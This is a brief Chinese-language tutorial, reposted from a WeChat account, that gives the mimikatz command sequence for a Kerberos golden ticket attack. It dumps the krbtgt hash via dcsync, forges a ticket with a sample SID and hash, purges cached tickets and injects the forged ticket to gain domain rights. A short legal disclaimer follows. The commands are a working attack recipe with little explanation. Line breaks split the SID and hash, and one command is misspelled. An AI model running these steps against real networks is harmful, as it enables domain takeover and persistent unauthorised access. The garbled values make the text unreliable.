0X01 简介
在域控服务器(Windows Server
2008
(DC))上获取krbtgt帐户的SID和Hash:
Lasdump::dcsync /domain:test.com(domain) /user:krbtgt(username)
制作黄金票据,需管理员运行mimikatz
Kerberos::golden /admin:administrator /domain:test.com /sid:S
-1
-5
-21
-1406194077
-816462478
-1442205416
/krbtgt:
39
dff60b4b2db4e384684eab26cc7900 /ticket:
123.
kirbi
注:SID值最后面的
502
不需要添加
清空本地票据缓存
klist purge(CMD)
Kerberos
:
:purge(mimikatz)
导入黄金票据(Windows 7)
kerberos
::ptt
123
.kirbi
退出mimikatz exit 获得权限
原文始发于微信公众号(皓月的笔记本):【知识整理】域渗透之黄金票据(Golden ticket)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论